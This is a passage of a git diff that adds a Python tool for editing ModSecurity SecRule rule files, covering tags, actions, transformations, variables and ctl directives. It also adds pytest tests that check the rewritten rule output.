dest="remove_action", help="Remove action from SecRule (string)", required=False) + parser.add_argument("--append-ctl", dest="append_ctl", help="Append ctl action on SecRule (example: 'ruleRemoveTargetById=1234;ARGS:passwd') (string)", required=False) + parser.add_argument("--target-file", dest="target_file", help="Save changes in another file (string)", required=False) + parser.add_argument("--skip-chain", dest="skip_chain", help="Skip chained rules", action="store_true", required=False) + parser.add_argument("--dryrun", dest="dryrun", help="Show changes without write", action="store_true", required=False) + parser.add_argument("--silent", dest="silent", help="Do not output content file on dryrun", action="store_true", required=False) + parser.add_argument("--debug", dest="debug", help="Show debug messages", action="store_true", required=False) + parser.add_argument("--json", dest="output_json", help="Get all output in JSON format", action="store_true", required=False) + return parser + +class RuleFileItem(object): + def __init__(self, data, context): + self._data = data + self._line_numbers = {"rule_line": data["lineno"]} + + def modify(self, context): + pass + + def generate_lines(self, line_number_change): + new_line_number_change = self._update_line_numbers(line_number_change) + return (self._data, new_line_number_change) + + def _update_line_numbers(self, line_number_change): + self._data["lineno"] = self._line_numbers["rule_line"] + line_number_change + + return line_number_change + +class SecAction(RuleFileItem): + TAG_RENAME_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_VALUES_REGEX = re.compile('^([^:]+)(?::(.+))?$') + CTL_APPEND_REGEX = re.compile('^([^=]+)=([^;]+)(;[^:]+:.+|)$') + CTL_APPEND_PARAMS_REGEX = re.compile('^;([^:]+):(.+)$') + id = None + _id_matcher = None + + def __init__(self, data, context): + super().__init__(data, context) + + for action in self.get_actions(): + action["id"] = uuid.uuid4() + if action["act_name"] == "id": + self.id = int(action["act_arg"]) + break + + if "oplineno" in self._data: + self._line_numbers["opline"] = self._data["oplineno"] + for action in self.get_actions(): + self._line_numbers[("action", uuid)] = action["lineno"] + + def _parse_var(self, variable): + negated = False + counter = False + newvar = variable + newvarpart = "" + quote_type = "no_quote" + m = re.match('^([!&]?)([^:]+)(?::(.+))?$', variable) + if m: + counter = m.group(1) == '&' + negated = m.group(1) == '!' + newvar = m.group(2) + varpart = m.group(3) + if varpart is not None: + if varpart[0] == '"' and varpart[-1] == '"': + quote_type = 'quoted' + varpart = varpart[1:-1] + elif varpart[0] == "'" and varpart[-1] == "'": + quote_type = 'quotes' + varpart = varpart[1:-1] + newvarpart = varpart + return { + "variable": newvar, + "variable_part": newvarpart, + "quote_type": quote_type, + "negated": negated, + "counter": counter + } + + def _is_equal_variable(self, variable1, variable2): + compare_fields = ("variable", "variable_part", "negated", "counter") + return all(variable1[field] == variable2[field] for field in compare_fields) + + def _has_variable(self, variable): + for var in self.get_variables(): + if self._is_equal_variable(variable, var): + return True + return False + + + + def _update_line_numbers(self, line_number_change): + #TODO: doesn't yet work when order changes, e.g. variables and tags may not have been grouped together + super()._update_line_numbers(line_number_change) + + first_line_number = last_line_number = self._data["lineno"] + + if "oplineno" in self._data: + last_line_number = self._line_numbers["opline"] + line_number_change + self._data["oplineno"] = last_line_number + + + for action in self.get_actions(): + try: + last_line_number = self._line_numbers[("action", action["id"])] + line_number_change + action["lineno"] = last_line_number + except KeyError: + # keep everything on one line if it already was + if any(lineno > self._line_numbers['rule_line'] for lineno in self._line_numbers.values()): + last_line_number += 1 + action["lineno"] = last_line_number + + original_first_line_number = min(self._line_numbers.values()) + original_last_line_number = max(self._line_numbers.values()) + original_length = original_last_line_number - original_first_line_number + new_length = last_line_number - first_line_number + start_change = first_line_number - original_first_line_number + length_change = new_length - original_length + total_change = length_change + start_change + return total_change + + def modify(self, context): + if context.args.filter_rule_id and not self.matches_id(context.args.filter_rule_id): + return + + self.append_tag(context) + self.remove_tag(context) + self.rename_tag(context) + self.append_tfunc(context) + self.remove_tfunc(context) + self.append_action(context) + self.replace_action(context) + self.remove_action(context) + self.append_variables(context) + self.remove_variables(context) + self.replace_variables(context) + self.append_ctl(context) + self.sort_tags(context) + + def get_actions(self): + try: + return self._data["actions"] + except KeyError: + return [] + + def set_actions(self, actions): + self._data["actions"] = actions + + def get_variables(self): + try: + return self._data["variables"] + except KeyError: + return [] + + def set_variables(self, variables): + self._data["variables"] = variables + + def get_tags(self): + return [action for action in self.get_actions() if action["act_name"] == "tag"] + + def get_ctls(self): + return [action for action in self.get_actions() if action["act_name"] == "ctl"] + + def matches_id(self, id_pattern): + if self._id_matcher is None: + self._id_matcher = re.compile(id_pattern) + return self._id_matcher.match(str(self.id)) != None + + def append_tag(self, context): + if context.args.append_tag is None: + return + + #TODO: support appending multiple tags + tags = self.get_tags() + if context.args.append_tag in [tag["act_arg"] for tag in tags]: + return + + actions = self.get_actions() + new_act_list = [] + last_tag_line = 0 + tag_order = ACTION_ORDER["tag"] + new_tag = { + 'id': uuid.uuid4(), + 'act_name': 'tag', + 'lineno': 0, + 'act_quote': 'quotes', + 'act_arg': context.args.append_tag, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= tag_order: + last_tag_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > tag_order or index == last_action_index): + done = True + new_act_list.append(new_tag) + if context.args.debug: + context.dprint(self.id, "append-tag", f"append tag {context.args.append_tag} on line {last_tag_line}", 0) + if action_order > tag_order: + new_act_list.append(action) + self.set_actions(new_act_list) + + def remove_tag(self, context): + if context.args.remove_tag is None: + return + + #TODO: support removing multiple tags + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] == "tag": + if action["act_arg"] != context.args.remove_tag: + new_act_list.append(action) + else: + if context.args.debug: + context.dprint(self.id, "remove-tag", f"remove tag {context.args.remove_tag} on line {action['lineno']}", 0) + else: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def rename_tag(self, context): + if context.args.rename_tag is None: + return + + match = self.TAG_RENAME_REGEX.match(context.args.rename_tag) + if match is None: + return + + old_tag = match.group(1) + new_tag = match.group(2) + new_act_list = [] + for act in self.get_actions(): + if act["act_name"] == "id": + current_rule_id = act["act_arg"] + if act["act_name"] == "tag": + if act["act_arg"] == old_tag: + act["act_arg"] = new_tag + if context.args.debug: + context.dprint(current_rule_id, "rename-tag", f"rename tag {old_tag} to {new_tag} on line {act['lineno']}", 0) + new_act_list.append(act) + else: + new_act_list.append(act) + self.set_actions(new_act_list) + + def append_action(self, context): + if context.args.append_action is None: + return + + match = self.ACTION_REPLACE_VALUES_REGEX.match(context.args.append_action) + if match is None: + return + + new_action_name = match.group(1) + new_action_value = match.group(2) or "" + + #TODO: support appending multiple actions + actions = self.get_actions() + if ( + new_action_name in [action["act_name"] for action in actions] and + new_action_value in [action["act_arg"] for action in actions] + ): + return + + new_act_list = [] + last_action_line = 0 + new_action_order = ACTION_ORDER[new_action_name] + has_quotes = len(new_action_value) > 0 and new_action_value[0] in '"\'' and new_action_value[-1] in '"\'' + if has_quotes: + new_action_value = new_action_value[1:-1] + new_action = { + 'id': uuid.uuid4(), + 'act_name': new_action_name, + 'lineno': 0, + 'act_quote': 'quotes' if has_quotes else 'no_quote', + 'act_arg': new_action_value, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= new_action_order: + last_action_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > new_action_order or index == last_action_index): + done = True + new_act_list.append(new_action) + if context.args.debug: + context.dprint(self.id, "append-action", f"append action {context.args.append_action} on line {last_action_line}", 0) + if action_order > new_action_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_action) + + self.set_actions(new_act_list) + + + + def replace_action(self, context): + if context.args.replace_action is None: + return + + match = self.ACTION_REPLACE_REGEX.match(context.args.replace_action) + if match is None: + return + + from_string = match.group(1) + to_string = match.group(2) + from_match = self.ACTION_REPLACE_VALUES_REGEX.match(from_string) + to_match = self.ACTION_REPLACE_VALUES_REGEX.match(to_string) + if from_match is None or to_match is None: + return + + from_actname = from_match.group(1) + from_actvalue = from_match.group(2) or "" + to_actname = to_match.group(1) + to_actvalue = to_match.group(2) or "" + has_quotes = len(to_actvalue) > 0 and to_actvalue[0] in '"\'' and to_actvalue[-1] in '"\'' + if has_quotes: + to_actvalue = to_actvalue[1:-1] + + for act in self.get_actions(): + if act["act_name"] == from_actname: + # match all actions of the specified name if `from_actvalue` is empty + if len(from_actvalue) == 0 or act["act_arg"] == from_actvalue: + act["act_name"] = to_actname + act["act_arg"] = to_actvalue + act["act_quote"] = "quotes" if has_quotes else "no_quote" + + def remove_action(self, context): + if context.args.remove_action is None: + return + + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] != context.args.remove_action: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def append_tfunc(self, context): + if context.args.append_tfunc is None: + return + + transform_order = ACTION_ORDER["t"] + actions = self.get_actions() + last_action_index = len(actions) - 1 + transformation_names = [action["act_arg"] for action in actions if action["act_name"] == "t"] + + for tfunc in context.args.append_tfunc: + if tfunc in transformation_names: + continue + + new_act_list = [] + done = False + last_lineno = 0 + for index, act in enumerate(actions): + action_name = act["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= transform_order: + last_lineno = act["lineno"] + new_act_list.append(act) + if not done and (action_order > transform_order or index == last_action_index): + done = True + new_act_list.append({ + 'id': uuid.uuid4(), + 'act_name': 't', + 'lineno': last_lineno, + 'act_quote': 'no_quote', + 'act_arg': tfunc, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + }) + if context.args.debug: + context.dprint(self.id, "append-tfunc", f"append transformation {context.args.append_tfunc} on line {last_lineno}", 0) + if action_order > transform_order: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def remove_tfunc(self, context): + if context.args.remove_tfunc is None: + return + + actions = self.get_actions() + for tfunc in context.args.remove_tfunc: + new_act_list = [] + for act in actions: + if act["act_name"] == "t": + if act["act_arg"] != tfunc: + new_act_list.append(act) + else: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def append_variables(self, context): + if context.args.append_variable is None: + return + + variables = self.get_variables() + for nv in context.args.append_variable: + newvar = self._parse_var(nv) + if self._has_variable(newvar): + continue + + new_var_list = [] + for v in variables: + new_var_list.append(v) + new_var_list.append({ + "variable": newvar["variable"], + "variable_part": newvar["variable_part"], + "quote_type": "no_quote", + "negated": newvar["negated"], + "counter": newvar["counter"] + }) + if context.args.debug: + context.dprint(self.id, "append-variable", f"Append variable {newvar}:{newvar['variable_part']}", 0) + variables = new_var_list + + self.set_variables(variables) + + + def remove_variables(self, context): + if context.args.remove_variable is None: + return + + variables = self.get_variables() + for nv in context.args.remove_variable: + var = self._parse_var(nv) + if not self._has_variable(var): + continue + + new_var_list = [] + for v in variables: + if not self._is_equal_variable(var, v): + new_var_list.append(v) + else: + if context.args.debug: + varpart = var["variable_part"] + negated = var["negated"] + counter = var["counter"] + context.dprint(self.id, "remove-variable", f"Removed variable {var}:{varpart} negated:{negated} counter:{counter}", 0) + variables = new_var_list + self.set_variables(variables) + + + def replace_variables(self, context): + if context.args.replace_variable is None: + return + + variables = self.get_variables() + for nv_tosplit in context.args.replace_variable: + oldvar, newvar = nv_tosplit.split(",") + ov = self._parse_var(oldvar) + nv = self._parse_var(newvar) + + new_variable = nv["variable"] + newvarpart = nv["variable_part"] + newnegated = nv["negated"] + newcounter = nv["counter"] + newquotetype = nv["quote_type"] + old_variable = ov["variable"] + oldvarpart = ov["variable_part"] + oldnegated = ov["negated"] + oldcounter = ov["counter"] + oldquotetype = ov["quote_type"] + new_var_list = [] + for v in variables: + if (v["variable"] == old_variable and v["variable_part"] == oldvarpart + and v["negated"] == oldnegated and v["counter"] == oldcounter and v["quote_type"] == oldquotetype): + new_var_list.append({ + "variable": new_variable, + "variable_part": newvarpart, + "quote_type": newquotetype, + "negated": newnegated, + "counter": newcounter + }) + if context.args.debug: + context.dprint(self.id, "replace-variable", f"Replaced variable {oldvar}:{oldvarpart} negated:{oldnegated} counter:{oldcounter} quote_type:{oldquotetype} with {newvar}:{newvarpart} negated:{newnegated} counter:{newcounter} quote_type:{newquotetype}", 0) + else: + new_var_list.append(v) + variables = new_var_list + + self.set_variables(variables) + + def append_ctl(self, context): + # TODO: support appending multiple ctl + if context.args.append_ctl is None: + return + + match = self.CTL_APPEND_REGEX.match(context.args.append_ctl) + if match is None: + return + + arg = match.group(1) + if arg.startswith('ctl:'): + arg = arg[4:] + val = match.group(2) + + params = self.CTL_APPEND_PARAMS_REGEX.match(match.group(3)) + param = params.group(1) if params is not None else "" + paramval = params.group(2) if params is not None else "" + + ctls = self.get_ctls() + if ( + arg in [ctl["act_arg"] for ctl in ctls] and + val in [ctl["act_arg_val"] for ctl in ctls] and + param in [ctl["act_arg_val_param"] for ctl in ctls] and + paramval in [ctl["act_arg_val_param_val"] for ctl in ctls] + ): + return + + actions = self.get_actions() + new_act_list = [] + last_ctl_line = 0 + ctl_order = ACTION_ORDER["ctl"] + new_ctl = { + "id": uuid.uuid4(), + "act_name": "ctl", + "lineno": last_ctl_line, + "act_quote": "no_quote", + "act_arg": arg, + "act_arg_val": val, + "act_arg_val_param": param, + "act_arg_val_param_val": paramval + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= ctl_order: + last_ctl_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > ctl_order or index == last_action_index): + done = True + new_act_list.append(new_ctl) + if context.args.debug: + context.dprint(self.id, "append-ctl", f"append ctl {context.args.append_ctl} on line {last_ctl_line}", 0) + if action_order > ctl_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_ctl) + + self.set_actions(new_act_list) + + + def sort_tags(self, context): + #TODO: tags don't need to be grouped together; need to look through all actions + if not context.args.sort_tags: + return + + new_act_list = [] + post_tag_actions = [] + tags = [] + last_lineno = None + found_tag = False + for act in self.get_actions(): + if act["act_name"] == "tag": + tags.append(act) + found_tag = True + if last_lineno is None: + first_lineno = act["lineno"] + elif not found_tag: + new_act_list.append(act) + elif found_tag: + post_tag_actions.append(act) + + def get_sort_key(tag): + return tag["act_arg"].lower() + + sorted_tags = sorted(tags, key=get_sort_key) + for tag in sorted_tags: + new_act_list.append(tag) + tag["lineno"] = first_lineno + first_lineno += 1 + + for act in post_tag_actions: + new_act_list.append(act) + + self.set_actions(new_act_list) + +class Comment(RuleFileItem): + pass + +class Directive(RuleFileItem): + pass + +class SecRule(SecAction): + _is_chained = False + + def __init__(self, data, context): + super().__init__(data, context) + + # for chained rules (they have no ID) + if self.id is None: + self.id = context.get_chain_starter_rule(self).id + self._is_chained = True + + def has_chained_rules(self): + return self._data["chained"] + + def is_chained(self): + return self._is_chained + + def modify(self, context): + if context.args.skip_chain and self.is_chained(): + return + + super().modify(context) + + +def write_output(context): + if context.args.dryrun and context.args.output_json: + print(json.dumps(context.generate_lines(), indent=4)) + return + + if context.args.dryrun: + if not context.args.silent: + print("\n".join(context.generate_output())) + return + + path = context.args.target_file if context.args.target_file else context.args.config + with open(path, 'w') as handle: + handle.write("\n".join(context.generate_output())) + + +def run(): + context = Context() + context.parse_arguments() + + with open(context.args.config) as file: + data = file.read() + + for rule in context.parse_rules(data): + rule.modify(context) + + write_output(context) + +if __name__ == '__main__': + run() diff --git a/util/rule_ctl/tests/__init__.py b/util/rule_ctl/tests/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/util/rule_ctl/tests/helpers.py b/util/rule_ctl/tests/helpers.py new file mode 100644 index 0000000000..52829f2b3a --- /dev/null +++ b/util/rule_ctl/tests/helpers.py @@ -0,0 +1,16 @@ +from rule_ctl import Context + +def create_context(arguments, rules_string): + context = Context() + patched_arguments = arguments + if "--config" not in arguments: + patched_arguments = arguments + ["--config", "dummy"] + context.parse_arguments(args=patched_arguments) + + for rule in context.parse_rules(rules_string): + rule.modify(context) + return context + + +def get_output(context): + return "\n".join(context.generate_output()) + "\n" diff --git a/util/rule_ctl/tests/rule_ctl_actions_test.py b/util/rule_ctl/tests/rule_ctl_actions_test.py new file mode 100644 index 0000000000..f5657a3bb3 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_actions_test.py @@ -0,0 +1,377 @@ +from .helpers import * + +class TestAppendAction: + def test_append_action_with_no_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_existing_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc',\\ + msg:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_duplicate_action(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_action_in_correct_order(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_chain(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_skip_chain(self): + arguments = [ + "--append-action", "msg:foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceAction: + def test_replace_action_with_no_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_existing_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + log:'abc'" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_duplicate_action(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_different_name(self): + arguments = [ + "--replace-action", "msg:foo,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + arguments = [ + "--replace-action", "deny,msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:foo,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_without_values(self): + arguments = [ + "--replace-action", "pass,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + pass,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_for_any_value(self): + arguments = [ + "--replace-action", "msg,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:bar,\\ + msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_quotes(self): + arguments = [ + "--replace-action", "msg,msg:'bar'", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:'bar',\\ + msg:'bar',\\ + msg:'bar'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_skip_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_ctl_test.py b/util/rule_ctl/tests/rule_ctl_ctl_test.py new file mode 100644 index 0000000000..efcf905262 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_ctl_test.py @@ -0,0 +1,125 @@ +from .helpers import * + +class TestAppendControl: + def test_append_ctl_with_no_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_existing_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_duplicate_ctl(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_ctl_in_correct_order(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ver:3" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + ver:3" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_ignores_ctl_prefix(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_with_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" "ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_skip_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_tags_test.py b/util/rule_ctl/tests/rule_ctl_tags_test.py new file mode 100644 index 0000000000..a65e66ef93 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_tags_test.py @@ -0,0 +1,395 @@ +from .helpers import * + +class TestAppendTag: + def test_append_tag_with_no_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_existing_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc',\\ + tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_duplicate_tag(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo',\\ + tag:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_tag_in_correct_order(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + 